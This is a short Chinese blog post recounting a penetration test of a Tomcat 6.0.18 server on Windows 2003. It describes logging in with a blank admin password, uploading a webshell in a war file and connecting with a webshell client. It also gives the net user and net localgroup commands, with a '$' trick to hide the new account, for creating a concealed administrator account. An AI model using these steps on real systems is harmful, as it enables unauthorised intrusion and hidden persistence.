记一次渗透实例
訪問測試主頁時,發現熟悉的tomcat圖標,果斷進行8080端口訪問,進入tomcat默認頁面。
這里存在弱口令登錄問題(用戶名:admin,密碼:空),登錄以后進入管理界面,可以看到tomcat版本號為:6.0.18;操作系統為windows 2003
注意到這里可以上傳war包。上傳小馬shell.war,嘗試訪問http://localhost:8080/shell 和http://localhost:8080/shell/shell.jsp
訪問http://localhost:8080/shell/shell.jsp 出現報錯500,至此shell已上傳成功,使用冰蝎進行連接,發現是管理員賬號。
至此拿到shell了,可以拿著報告跟項目組拍桌子吼道:你們項目組一個能打的都沒有嗎(浩哥經典語錄)!
遠程登錄
知道了用戶administrator的存在,進行3389端口的遠程登錄口令暴破,失敗告終。
利用前面我們都拿到的shell,可以創建一個用戶進行遠程登錄嘛
創建用戶
net user username password /add
ps:在用戶名后面加上”$”后在命令行使用net user查看所有用戶時會隱藏該用戶。 將創建的用戶加入管理員組 net localgroup Administrators username /add
現在可以使用創建的用戶進行遠程登錄了
至此可以關機回家睡個好覺了。沒什么技術難點,關鍵在于運氣很好,哈哈哈。
【想學啊你,我教你啊 】
總結
- 上一篇: 分享SSRF漏洞的学习和利用
- 下一篇: 渗透新手福利---xss到获取cooki